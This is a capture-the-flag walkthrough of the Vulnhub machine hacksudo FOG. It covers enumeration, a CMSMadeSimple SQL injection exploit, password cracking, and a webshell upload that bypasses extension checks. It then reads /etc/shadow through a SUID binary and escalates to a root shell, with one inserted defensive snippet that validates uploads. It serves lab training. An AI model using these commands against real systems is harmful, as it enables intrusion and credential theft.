Hacksudo FOG Walkthrough – Writeup – Vulnhub

In this post, I am going to do the walkthrough of the machine hacksudo FOG from Vulnhub by Vishal Waghmare.

Machine Link: https://www.vulnhub.com/entry/hacksudo-fog,697/

Initial Enumeration

I began with netdiscover and then nmap.

sudo netdiscover -i eth0 -r
nmap -v -T4 -p- -sC -sV --min-rate=1000

So, we have telnet, ssh, http, https and mysql services open. I would like to see what the website offers.

We have a piece of information that suggests some secret message might be hidden in an audio file. So, I will download the video file shown in the source, for enumeration later. Also, the comment says Caesar cipher. Hence, I believe there is some text which is encoded by this technique. Meanwhile, I will run gobuster to enumerate files.

gobuster dir -u -x html,txt,php --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The initial enumeration shows there is a dict.txt and a /cms path and I will visit both of the paths.

There is a dictionary list and a CMSMadeSimple CMS website. After some time I also found another path in the enumeration called /fog. Then, I opened the path but it’s empty.

Subsequently, I looked into Exploit-DB for the CMS, and there is an unauthenticated SQL injection for versions below 2.2.10. To identify the version of the CMS, I am going to use whatweb.

The version is 2.2.5, so it too suffers from the unauthenticated SQL injection: https://www.exploit-db.com/exploits/46635. However, the exploit code is written for Python 2, so I have ported it to Python 3.

python3 46635.py -u

Although the exploit says unauthenticated, I think it’s not the case. The only thing that I found useful was the username, which I could use to crack passwords in different services. Previously, we had found a dict.txt file that contained candidate passwords.

I downloaded all the files to my local machine and tried opening all of them. Unfortunately, the zip file is password protected. On the other hand, the zip contains a wav file which might hold the secret information.

Now, I will crack the password using John the Ripper.

zip2john secr3tSteg.zip | tee hash
john hash --wordlist=/home/kali/rockyou.txt
unzip secr3tSteg.zip

After this, I will clone the GitHub repo and try running the script on the extracted wav file.

git clone https://github.com/hacksudo/SoundStegno.git
cd SoundStegno
python3 ExWave.py -f ../hacksudoSTEGNO.wav

I found a Caesar cipher which I could decode using a website.

Caesar Cipher - Shift by 3
wwww.localhost/fog Username=fog:password=hacksudoISRO

Finally, we got the credentials for CMS.

In an upload directory, we found a rcefile.txt whose mime-type is X-PHP. The file contains code that executes shell commands passed through the GET parameter cmd. Hence, I am going to change the extension of the file.

I copied the file using the copy feature of the file manager. From now on, I can execute remote commands through the GET parameter, e.g. -al

The source file includes proper formatting.

So, we can now upload our webshell and execute it. However, it looks like uploading files with a php extension isn’t allowed. Therefore, I have to change the extension to txt to allow the upload. After uploading, I could simply change the extension back to php, as we saw in the previous example.
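The two weaknesses just described (PHP code accepted because the name ends in .txt, and the file manager then letting that file be copied or renamed to a .php name) are closed by applying one server-side check to both the upload and the rename/copy operation. The following Python is an added illustration and not code from CMSMadeSimple or from the author; the extension lists and the two hook functions are assumptions about how such a check would be wired in.

```python
import os
import re

# Assumption: an Apache/PHP host where any of these extensions is executed by the server.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "phps", "htaccess"}
# Assumption: the CMS only needs to accept plain documents and images.
ALLOWED_EXTENSIONS = {"txt", "jpg", "jpeg", "png", "gif", "pdf"}
# Matches an opening PHP tag anywhere in the body, regardless of the file name.
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def all_extensions(filename):
    """Every extension segment of a name, lowercased: 'x.php.txt' -> ['php', 'txt']."""
    base = os.path.basename(filename)
    return [part.lower() for part in base.split(".")[1:]]


def upload_allowed(filename, content):
    """Check both the name and the body. The name alone is not enough, because the
    CMS lets a user rename the file later; the body alone is not enough, because a
    .php name with harmless content can be overwritten later."""
    exts = all_extensions(filename)
    if not exts or exts[-1] not in ALLOWED_EXTENSIONS:
        return False, "extension not in allow-list"
    if any(ext in EXECUTABLE_EXTENSIONS for ext in exts):
        return False, "executable extension embedded in name"
    if PHP_OPEN_TAG.search(content):
        return False, "PHP code in body"
    return True, "ok"


def rename_allowed(new_name, current_content):
    """Hypothetical hook for the file manager's rename/copy feature: the target name
    has to pass exactly the same test as a fresh upload of the existing content, so
    'rcefile.txt' can never become 'rcefile.php'."""
    return upload_allowed(new_name, current_content)
```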

Finally, I got the reverse shell and did some extra work to get a proper pty shell.

stty columns 173 rows 43
cd /var/www
ls -al
cat flag2.txt

Identify users

cat /etc/passwd | grep bash

Identify suid binaries

cd /tmp
wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py --no-check-certificate && chmod 777 suid3num.py

I decided to read the shadow file using the SUID look binary (the GTFOBins technique, with LFILE pointing at the target file).

LFILE=/etc/shadow
/usr/bin/look '' "$LFILE"

I copied the hash of the user isro to a new file on my local machine and ran John the Ripper.

john hash --wordlist=/home/kali/rockyou.txt

I switched to the user isro and got the flag.

su isro
ls -al
cat user.txt

sudo -l reveals that the user can execute the ls command as the root user. I searched the internet and didn’t find any way to escalate privileges using ls.

However, there is a directory fog which contains a binary with the same name. We can look at its content using the strings command.

cd fog
file fog
strings fog

It looks like the application is run as the root user.

Now, by using the following command, we can switch to root.

os.system("/bin/bash -i")

Now, we capture the root flag.

cd /root
cat root.txt